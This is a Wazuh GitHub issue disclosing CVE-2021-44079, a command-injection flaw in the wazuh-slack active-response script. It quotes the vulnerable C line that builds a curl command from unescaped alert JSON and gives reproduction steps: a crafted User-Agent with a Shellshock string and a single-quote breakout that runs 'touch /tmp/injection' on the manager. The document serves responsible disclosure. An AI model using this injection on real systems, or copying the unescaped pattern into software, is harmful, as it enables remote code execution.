Headline
CVE-2021-44079: Active response tools allow arbitrary code execution · Issue #10858 · wazuh/wazuh
In the wazuh-slack active response script in Wazuh before 4.2.5, untrusted user agents are passed to a curl command line, potentially resulting in remote code execution.
Wazuh version
Component
Install type
Install method
Platform
Fix
4.2.0
Active-response script
Manager/Agent
Packages
CentOS 7
#10809
This issue was reported by @rk700.
We found a command injection bug in the active-response script wazuh-slack.
The alert json data is put in the shell command line as POST body for curl:
snprintf(system_command, OS_MAXSTR -1, “curl -H \"Accept: application/json\” -H \"Content-Type: application/json\" -d ‘%s’ %s", output_str, site_url);
However, the raw log line which could be partially controlled by an attacker is also included in the JSON data. Single quote in JSON is not escaped and therefore could be used to truncate the command:
-d '<json data that could be partially controlled>'
Steps to reproduce are as follows.
First, we add the wazuh-slack active-response in the config:
<command> <name>wazuh-slack</name> <executable>wazuh-slack</executable> <!-- an echo server for debug --> <extra_args>http://192.168.1.95:8080/test</extra_args> </command>
<active-response> <disabled>no</disabled> <command>wazuh-slack</command> <location>server</location> <level>6</level> </active-response>
Then we setup a web server on the client machine, and send request with crafted User-Agent:
curl -I 192.168.1.96/1.html -A "() { :;};ls ' 192.168.1.95:8080;touch /tmp/injection;echo '"
The shellshock PoC will trigger an alert, and the crafted User-Agent value which is contained in web server access.log would also be included in the command line as follows:
curl -H “Accept: application/json” -H “Content-Type: application/json” -d '{"attachments":[{"color “:"danger","pretext":"WAZUH Alert","title":"Shellshock attack detected","text":"192.168.1.96 - - [04/Nov/2021:12:53:56 +0800] \"GET /1.html HTTP/1.1\” 200 5 \"-\" \"() { :;};ls ' 192.168.1.95:8080;touch /tmp/injection;echo ‘\"","fields":[{"title":"Agent","value":"(001) - hids_client"},{"title":"Location","value":"/var/ log/apache2/access.log"},{"title":"Rule ID","value":"31168 (level 15)"}],"ts":"1636001638.913845"}]}’ http://192.168.1.95:8080/test
Here we use the single quote to jump out of -d '<json data>' and inject the command touch /tmp/injection with semicolons. We can verify that on the server where the wazuh-slack is running(the wazuh-manager machine in this case since we set the location as server in the active-response config):
root@ubuntu:~# ls -l /tmp/injection
-rw-r--r-- 1 root ossec 0 Nov 4 17:19 /tmp/injection
Special thanks to @rk700 for detecting and reporting this issue to the team.